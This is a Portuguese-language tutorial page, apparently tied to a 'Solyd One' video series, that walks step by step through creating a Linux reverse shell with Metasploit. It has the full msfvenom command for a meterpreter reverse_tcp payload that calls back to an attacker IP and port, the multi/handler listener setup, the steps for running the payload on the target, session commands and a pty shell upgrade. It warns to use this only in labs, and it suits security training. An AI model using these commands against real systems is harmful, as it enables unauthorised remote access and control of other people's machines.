Shell Reverse | Script automatizados | Solyd One
- Shell Reverse | Script automatizados | Solyd One
Playlist Solyd One: 🔗 Criando um shell reverse
✅ Ambiente: Linux ou Kali Linux ⚠️ Use apenas em laboratórios como HackTheBox, TryHackMe, VMs como Metasploitable, etc.
🧱 ETAPA 1 – Gerar o Payload com msfvenom
🔹 Exemplo: Payload linux/x86/meterpreter/reverse_tcp
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf -o shell_reverso.elf
| Parâmetro | Função |
|---|---|
-p | Payload a ser usado (reverso, TCP) |
LHOST | IP da máquina atacante (onde o msfconsole ouvirá) |
LPORT | Porta que será usada para receber a conexão |
-f elf | Formato do arquivo de saída (executável Linux) |
-o | Nome do arquivo gerado |
📁 Resultado: Um executável Linux chamado
shell_reverso.elf
🖥 ETAPA 2 – Preparar o msfconsole para escutar
🔹 Passos dentro do msfconsole:
msfconsole
Então, digite:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.0.10
set LPORT 4444
exploit
| Comando | Função |
|---|---|
use exploit/multi/handler | Carrega o módulo genérico de escuta |
set payload ... | Define o mesmo payload usado no msfvenom |
set LHOST / LPORT | Define IP e porta local para escuta |
exploit | Inicia o listener |
✅ Agora o Metasploit está escutando conexões reversas.
🧪 ETAPA 3 – Executar o Payload no Alvo
Em uma máquina de teste (como uma VM com Metasploitable), envie e execute o arquivo:
chmod +x shell_reverso.elf
./shell_reverso.elf
⚠️ Isso fará com que a máquina teste tente se conectar de volta ao IP e porta definidos.
📡 ETAPA 4 – Gerenciar a Sessão
Se a conex\u00e3o for bem-sucedida, voc\u00ea ver\u00e1 algo como:
[*] Meterpreter session 1 opened
Então, para interagir:
sessions -l # lista as sessões ativas
sessions -i 1 # interage com a sessão 1
Dentro da sessão meterpreter, você pode usar comandos como:
sysinfo # mostra informações do sistema
getuid # mostra o usuário atual
shell # acessa o terminal do sistema remoto
Para sair:
background # volta ao msfconsole
exit # encerra a sessão ou o msfconsole
Pós
- Obter um shell mais ajeitado
python -c "import pty; pty.spawn('/bin/bash');"